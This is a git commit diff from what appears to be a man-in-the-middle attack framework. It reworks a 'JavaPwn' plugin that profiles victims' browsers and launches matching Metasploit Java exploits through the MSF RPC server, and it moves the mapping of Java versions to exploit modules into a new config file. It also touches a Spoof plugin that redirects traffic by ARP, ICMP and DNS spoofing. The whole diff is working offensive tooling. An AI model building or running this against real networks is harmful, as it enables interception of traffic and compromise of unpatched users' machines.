fixed errors in javapwn plugin and added config file

2025-07-07 13:32:18 -07:00 · 2014-07-26 14:27:20 +02:00 · 2014-07-26 14:27:20 +02:00 · c162833916
commit c162833916
parent 9d860437c4
3 changed files with 28 additions and 11 deletions
--- a/config_files/javapwn.cfg
+++ b/config_files/javapwn.cfg
@ -0,0 +1,5 @@
+#Example config file for the javapwn plugin
+1.702 = "java_atomicreferencearray"
+1.704 = "java_verifier_field_access"
+1.706 = "java_jre17_exec"
+1.707 = "java_jre17_jaxws"
--- a/plugins/JavaPwn.py
+++ b/plugins/JavaPwn.py
@ -1,13 +1,18 @@
 from plugins.plugin import Plugin
 from plugins.BrowserProfiler import BrowserProfiler
 from time import sleep
-import libs.msfrpc
+import libs.msfrpc as msfrpc
 import string
 import random
 import threading
 import logging
 import sys, os

+try:
+    from configobj import ConfigObj
+except:
+    sys.exit('[-] configobj library not installed!')
+
 class JavaPwn(BrowserProfiler, Plugin):
    name = "JavaPwn"
    optname = "javapwn"
@ -21,16 +26,20 @@ class JavaPwn(BrowserProfiler, Plugin):
        self.msfport = options.msfport
        self.rpcip = options.rpcip
        self.rpcpass = options.rpcpass
+        self.javapwncfg = options.javapwncfg

        if not self.msfip:
            sys.exit('[-] JavaPwn plugin requires --msfip')

-        #Correlates java versions with their relative exploits
-        self.javaVersionDic = {1.702: "java_atomicreferencearray",
-                               1.704: "java_verifier_field_access",
-                               1.706: "java_jre17_exec",
-                               1.707: "java_jre17_jaxws"}
-                               #add your exploits here converting the max affected java version to a float (e.g. java version 1.7.05 => 1.705)
+        if not self.javapwncfg:
+            self.javapwncfg = './config_files/javapwn.cfg'
+        
+        self.javacfg = ConfigObj(self.javapwncfg)
+
+        self.javaVersionDic = {}
+        for key, value in self.javacfg.iteritems():
+            self.javaVersionDic[float(key)] = value
+

        self.sploited_ips = [] # store ip of pwned or not vulnarable clients so we don't re-exploit

@ -39,7 +48,7 @@ class JavaPwn(BrowserProfiler, Plugin):
            msf.login('msf', self.rpcpass)
            version = msf.call('core.version')['version']
            print "[*] Succesfully connected to Metasploit v%s" % version
-        except:
+        except Exception:
            sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")

        #Initialize the BrowserProfiler plugin
@ -166,11 +175,13 @@ class JavaPwn(BrowserProfiler, Plugin):
        options.add_argument('--msfport', dest='msfport', default='8080', help='Port of MSF web-server [default: 8080]')
        options.add_argument('--rpcip', dest='rpcip', default='127.0.0.1', help='IP of MSF MSGRPC server [default: localhost]')
        options.add_argument('--rpcpass', dest='rpcpass', default='abc123', help='Password for the MSF MSGRPC server [default: abc123]')
+        options.add_argument('--javapwncfg', type=file, help='Specify a config file')

    def finish(self):
        '''This will be called when shutting down'''
        msf = msfrpc.Msfrpc({"host": self.rpcip})
        msf.login('msf', self.rpcpass)
+        
        jobs = msf.call('job.list')
        if len(jobs) > 0:
            print '[*] Stopping all running metasploit jobs'
@ -180,5 +191,5 @@ class JavaPwn(BrowserProfiler, Plugin):
        consoles = msf.call('console.list')['consoles']
        if len(consoles) > 0:
            print "[*] Closing all virtual consoles"
-            for b,i,p in consoles.items():
-                msf.call('console.destroy', [i])
+            for console in consoles:
+                msf.call('console.destroy', [console['id']])
--- a/plugins/Spoof.py
+++ b/plugins/Spoof.py
@ -32,6 +32,7 @@ class Spoof(Plugin):
        self.arp = options.arp
        self.icmp = options.icmp
        self.dns = options.dns
+        #self.dhcp = options.dhcp
        self.domain = options.domain
        self.dnsip = options.dnsip
        self.dnscfg = options.dnscfg
@ -188,7 +189,7 @@ class Spoof(Plugin):
        options.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP Spoofing')
        options.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP Redirects')
        options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Redirect DNS requests')
-        #options.add_argument('--dhcp')
+       # options.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using fake DHCP offers')
        options.add_argument('--iface', dest='interface', help='Specify the interface to use')
        options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
        options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]')